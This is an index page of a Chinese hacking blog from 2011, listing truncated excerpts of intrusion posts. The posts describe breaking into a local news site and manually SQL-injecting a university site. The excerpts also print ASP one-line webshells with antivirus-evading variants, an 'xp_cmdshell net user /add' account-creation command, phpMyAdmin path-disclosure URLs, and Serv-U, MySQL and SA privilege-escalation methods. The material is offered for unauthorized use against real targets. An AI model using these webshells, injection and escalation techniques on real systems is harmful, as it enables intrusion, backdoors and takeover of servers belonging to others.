上一页 1 ··· 20 21 22 23 24 25 26 27 28 ··· 30 下一页

2011年3月29日

检测某地方新闻小站

摘要: 一日,朋友发过来一个URL,让拿SHELL,打开一看,是一个新闻站点。乍一看去,全部都是HTML的静态页面,估计又是类似CMS的程序吧,只有后台是动态的,前台全部都是生成的静态页面。于是抄起WWWSCAN开始扫目录,看看能不能扫出个上传点什么的,因为字典比较多,WWWSCAN扫的时间比较长,所以我同时开始在GOOGLE上面查找注射点。利用site:www.xxxxxx.com inurl:asp ,来查找所有的ASP文件,然后一个一个去测试。测试过程中,发现整站用到了防注入程序,而且有的地方单独用到了isnumeric之类的函数进行了判断。经过长时间的手工检测,终于在一个新闻评论页面,找到了一 阅读全文

posted @ 2011-03-29 04:15 =_=! 阅读(189) 评论(0) 推荐(0) 编辑

突破输入框长度限制

摘要: 前天TK研究的一个网页改COOKIE的小玩意儿给我了一点点灵感昨晚又和adam聊了聊SQL注入,今早上来就写了这篇东东.xp_cmdshell net user abc def /add这些命令大家想必都用烂了吧,但是在实际的测试中我们常常会遇到这样的情况,服务器的asp脚本没有对用户的输入做限制,但是在网页上通过对输入框设置maxlength属性使我们的很多攻击就不能进行.有些人可能会想到把网页考到本地,然后本地提交但是有一个问题是有的网站通过简单的比较HTTP_REFERER和SERVER_NAME的值就可以防止.好了很多人没办法了吧,除了写SOCKET程序改变HTTP_REFERER还有 阅读全文

posted @ 2011-03-29 04:00 =_=! 阅读(858) 评论(0) 推荐(0) 编辑

一句话后门

摘要: eval的一句话有时候会失败execute的一句话基本上都是成功的!By:van附:(多种写一句话的方法)ASP一句话1.<%eval request("YouPass")%>2. <%executerequest("YouPass")%>3. <%execute(request("YouPass"))%>免杀大部分网站的一句话4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.La 阅读全文

posted @ 2011-03-29 01:41 =_=! 阅读(268) 评论(0) 推荐(0) 编辑

支持serv-u 7.x的asp版本地提权

摘要: 思路是沿用空虚浪子心(http://www.inbreak.net/?action=show&id=134)的提权方法,由于asp不支持操作socket,只能采用新建域再删除.程序界面是抄袭陆大的serv-u 6.X回显程序的,嘿嘿.由于本人菜,找不出serv-u 7.0的userid究竟是怎么变化的,所以只删除了域......serv-u 7.4连不上的原因找出来了,原来是7.0以上的版本新增加了域之后会延迟一段时间才启动.原来的exp可以正常使用.为了大家方便,在上面添了一句话,重新奉上.EXP:<style type="text/css">< 阅读全文

posted @ 2011-03-29 01:35 =_=! 阅读(178) 评论(0) 推荐(0) 编辑

SQL Injection(SQL注入)介绍

摘要: 1.关于SQL Injection迄今为止,我基本没有看到谁写出一篇很完整的文章,或者说很成熟的解决方案(能做到 的人肯定很多,问题是没有流传开来,很遗憾) 我简单的说几点,希望启发大家思考,起到抛砖引玉的作用一、SQL Injection的原理SQL Injection的实现方法和破坏作用有很多,但万变不离其宗,其原理可以概括为一句话 :SQL Injection就是向服务器端提交事先准备好的数据,拼凑出攻击者想要的SQL语句,以改变数据库操作执行计划。我想,这么说也许不算精炼,但意思应该很明确了,这句话主要包含这么三层意思:1.攻击者通过何种途径注入?存在SQL Injection漏洞的地 阅读全文

posted @ 2011-03-29 01:30 =_=! 阅读(469) 评论(0) 推荐(0) 编辑

英文版 中文版 韩文版系统启动目录

该文被密码保护。 阅读全文

posted @ 2011-03-29 01:02 =_=! 阅读(0) 评论(0) 推荐(0) 编辑

手工注入纽约大学

摘要: 一 原理分析我看看mysql5比之前增加的系统数据库information_schema的结构,它是用来存储数据库系统信息的mysql> use information_schema;Database changedmysql> show tables;+—————————————+| Tables_in_information_schema |+—————————————+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES | 阅读全文

posted @ 2011-03-29 00:31 =_=! 阅读(200) 评论(0) 推荐(0) 编辑

利用Mysql和PHPmyadmin提权入侵

摘要: 1:phpmyadmin 后台拿webshellphpmyadmin爆路径方法:weburl+phpmyadmin/themes/darkblue_orange/layout.inc.phphttp://url/phpmyadmin/libraries/select_lang.lib.phppphpmyadmin/libraries/export/xls.phpphpmyadmin/themes/darkblue_orange/layout.inc.phpD:\usr\www\html\phpMyAdmin\----start code---Create TABLE a (cmd text N 阅读全文

posted @ 2011-03-29 00:26 =_=! 阅读(1762) 评论(0) 推荐(0) 编辑

2011年3月28日

Sa提权sql语句大全

摘要: Sa提权方式很多,而最快捷的方式就是shift粘滞键镜像劫持。这种Sa提权方法必须满足几个条件,数据库可以远程访问,服务器开启了终端远程访问也就是3389和粘滞键功能。这样就可以利用Microsoft SQL Server Management Studio或其他漏洞检测工具来连接远程数据库了。个人推荐使用Microsoft SQL Server Management Studio,可以到微软官方下载地址:http://www.microsoft.com/web/downloads/platform.aspx。如果不用数据库可以不安装,选装Microsoft SQL Server Manage 阅读全文

posted @ 2011-03-28 05:43 =_=! 阅读(872) 评论(0) 推荐(0) 编辑

2011年3月27日

渗透技巧总结

摘要: 旁站路径问题1、读网站配置。2、用以下VBSOn Error Resume NextIf (LCase(Right(WScript.Fullname,11))="wscript.exe") ThenMsgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & "Usage:Cscript vWeb.vbs",4096,"Lilo"WScript.QuitEnd IfSet ObjS 阅读全文

posted @ 2011-03-27 23:22 =_=! 阅读(566) 评论(0) 推荐(0) 编辑

上一页 1 ··· 20 21 22 23 24 25 26 27 28 ··· 30 下一页

导航